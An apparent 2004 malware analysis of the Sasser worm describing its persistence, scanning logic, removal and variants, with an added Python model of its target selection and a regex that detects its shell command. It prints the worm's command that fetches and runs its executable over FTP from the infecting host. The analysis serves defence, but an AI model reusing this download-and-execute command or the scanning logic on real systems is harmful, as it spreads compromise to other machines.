Sasser Worm Analysis
- URL: http://www.secureworks.com/research/threats/sasser
- Date: May 1, 2004
- Author: Joe Stewart
Summary
A new worm called "Sasser" has been found spreading in the wild.
Analysis
The worm utilizes the MS04-011 LSASS exploit released by "houseofdabus" on Thursday April 29 2004. The worm executable was compiled on Friday April 30 2004 at 19:23:16 (timezone unknown).
When executed, the worm:
- Installs itself to %WINDIR% as avserve.exe
- Adds the following value under the Run key so that it is started at every logon:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
avserve.exe -> C:\%WINDIR%\avserve.exe
The scanner threads work as described below:
- The thread attempts to determine the local machine's IP address. It loops through every address returned by gethostbyname for the local hostname. If it finds a publicly routable Internet address (non-RFC1918) it will use that address. If none are found it will use any private subnet address (RFC1918 or 127.0.0.1) it finds. If no address is returned at all it will use 127.0.0.1. This address is the one the worm advertises to victims as the download source, so an infected host that only has a private address will hand victims an address they may not be able to reach.
- A target IP address to attack is generated:
- 50% of the time it will attempt to exploit a completely random IP address
- 25% of the time it will attempt to exploit a random address sharing the first octet of the local address (the local /8)
- 25% of the time it will attempt to exploit a random address sharing the first two octets of the local address (the local /16)
- If the LSASS exploit succeeds, it opens a command shell on the remote system listening on TCP port 9996. The worm connects to this port and sends the following commands:
- echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]_up.exe&echo off&del cmd.ftp&echo on
- These commands write an FTP script, use it to fetch the worm executable from the FTP server the worm runs on TCP port 5554 of the infecting machine, run the downloaded copy, and delete the script. The new copy then begins to spread from the target machine. (Note the "echo user" with no redirection: the script never actually sends a USER line, it relies on the worm's own FTP server not caring.)
- The thread sleeps for 250 milliseconds, then repeats the entire process
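The scanner-thread behaviour above, as an added example written for this analysis (it is not code from the worm or from SecureWorks): it reimplements the local-address selection and the 50/25/25 target rule as described, simulates how much of an infected host's scanning lands in its own /8 and /16, and matches the command string sent to the port-9996 shell so that the infecting host's address and the random executable name can be pulled out of a capture. The capture string, the 0-255 range for random octets and the treatment of "[rand]" as an arbitrary token are assumptions; the page does not say how either is generated. Nothing in it touches the network.

```python
"""Model of the Sasser scanner thread described in the analysis above.

Added example, not code from the worm or from SecureWorks.  Assumed: random
octets are drawn uniformly from 0-255 and "[rand]" in the command is any
non-empty token.  Nothing here touches the network.
"""
import ipaddress
import random
import re

# RFC1918 plus loopback: the addresses the worm will not prefer as its own.
_PRIVATE = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_private(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in _PRIVATE)


def pick_local_address(candidates):
    """Address the worm advertises in 'open <ip> 5554'.

    `candidates` stands in for what gethostbyname() returns for the local
    hostname.  A publicly routable address wins; otherwise the first private
    one; otherwise 127.0.0.1 (so the victim would try to fetch from itself).
    """
    for addr in candidates:
        if not is_private(addr):
            return addr
    return candidates[0] if candidates else "127.0.0.1"


def pick_target(local, roll, octets):
    """The 50/25/25 rule.  `roll` is a float in [0, 1) and `octets` four
    random ints in 0-255, passed in so the function is deterministic."""
    lo = local.split(".")
    o = [str(x) for x in octets]
    if roll < 0.5:            # completely random address
        t = o
    elif roll < 0.75:         # same first octet as the local address
        t = [lo[0], o[1], o[2], o[3]]
    else:                     # same first two octets
        t = [lo[0], lo[1], o[2], o[3]]
    return ".".join(t)


def next_target(local, rng):
    return pick_target(local, rng.random(),
                       [rng.randrange(256) for _ in range(4)])


def scan_distribution(local, n, seed=0):
    """Fraction of n generated targets inside the local /8 and local /16."""
    rng = random.Random(seed)
    lo = local.split(".")
    same8 = same16 = 0
    for _ in range(n):
        t = next_target(local, rng).split(".")
        if t[0] == lo[0]:
            same8 += 1
            if t[1] == lo[1]:
                same16 += 1
    return same8 / n, same16 / n


# The command sent to the port-9996 shell, as given in the analysis; the
# infecting host's IP and the random executable name are captured, and the
# name must reappear where the script runs it.
_SASSER_CMD = re.compile(
    r"echo open (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) 5554>>cmd\.ftp&"
    r"echo anonymous>>cmd\.ftp&echo user&echo bin>>cmd\.ftp&"
    r"echo get (?P<exe>[^&>]+_up\.exe)>>cmd\.ftp&echo bye>>cmd\.ftp&echo on&"
    r"ftp -s:cmd\.ftp&(?P=exe)&"
)


def match_sasser_command(data):
    """Return (infecting_ip, exe_name) if `data` carries the worm's script."""
    m = _SASSER_CMD.search(data)
    return (m.group("ip"), m.group("exe")) if m else None


# Constructed sample of what the worm would send to a freshly exploited host.
SAMPLE_CAPTURE = (
    "echo off&echo open 203.0.113.5 5554>>cmd.ftp&echo anonymous>>cmd.ftp&"
    "echo user&echo bin>>cmd.ftp&echo get 12345_up.exe>>cmd.ftp&"
    "echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&12345_up.exe&echo off&"
    "del cmd.ftp&echo on"
)

if __name__ == "__main__":
    print(pick_local_address(["192.168.1.5", "203.0.113.5"]))
    print(scan_distribution("203.0.113.5", 10000))
    print(match_sasser_command(SAMPLE_CAPTURE))
```

Because half of all targets are fully random, an infected host with a public address puts roughly half its scans into its own /8 and a quarter into its own /16; the matcher is the piece a sensor on port 9996 would use to name the upstream infected host.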
Removal
Use the task manager to kill the avserve.exe process, then delete the avserve.exe value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run. On a machine exposed to the Internet it may not be possible to run Windows Update and install the patch before the machine is compromised again, as Windows users experienced with the Blaster worm. Block TCP port 445 at the host or perimeter first and then patch the system for MS04-011, or download the patches on a clean machine and install them from a CDROM while the affected machine is offline.
More detailed removal instructions are available from Microsoft at http://www.microsoft.com/security/incident/sasser.asp
Update: May 11, 2004
The authors of the Netsky virus have claimed authorship of Sasser in comments included in the code of Netsky.AC. They provide a snippet of source code as proof. SecureWorks has also independently compared the binary code of both Sasser and Netsky and found other evidence supporting a common source code base in the two programs. Therefore the claim of "Team Skynet" appears to be credible.
Like Netsky, new variants of Sasser are being released quickly. As of this writing, six variants have been uncovered:
| Variant | Size | MD5 | Executable | Compile Date |
|---|---|---|---|---|
| A | 15,872 | a73c16ccd0b9c4f20bc7842edd90fc20 | avserve.exe | Fri Apr 30 19:23:16 2004 |
| B | 15,872 | 1a2c0e6130850f8fd9b9b5309413cd00 | avserve2.exe | Sat May 1 07:39:48 2004 |
| C | 15,872 | 831f4ee0a7d2d1113c80033f8d6ac372 | avserve2.exe | Sat May 1 14:07:32 2004 |
| D | 16,384 | 03f912899b3d90f9915d72fc9abb91be | skynetave.exe | Sun May 2 10:53:43 2004 |
| E | 15,872 | 741e3b03b3ff6e464a5a61e7d1875f7f | lsasss.exe | Mon May 3 18:04:54 2004 |
| F | 74,752 | 9d8d3837ef0dca757231349b5f81f26e | napatch.exe | Fri Apr 30 19:23:16 2004 |
The differences between the variants are as follows:
- B: changes to the code to implement a pseudo-forking mechanism when exploiting hosts.
- C: the number of scanning threads raised to 1024 from 128.
- D: the number of scanning threads set back to 128, and an IcmpSendEcho API call added before connecting to a host via TCP in order to speed up scanning (much as the Welchia worm does). Due to a bug, the D variant does not appear to run on Windows 2000.
- E: the shell and FTP ports changed to 1022 and 1023 respectively; a message box pops up at certain intervals telling the user that the system is vulnerable to MS04-011; it also attempts to kill certain Bagle variants if they are running on the same system. The E variant has the same bug as the D variant and does not appear to run on Windows 2000.
- F: a repack of the A variant binary with the mutex and the exe/registry entry strings edited using a hex editor. It is a copycat re-release similar to what we witnessed following the Blaster worm, which is why its compile date matches variant A.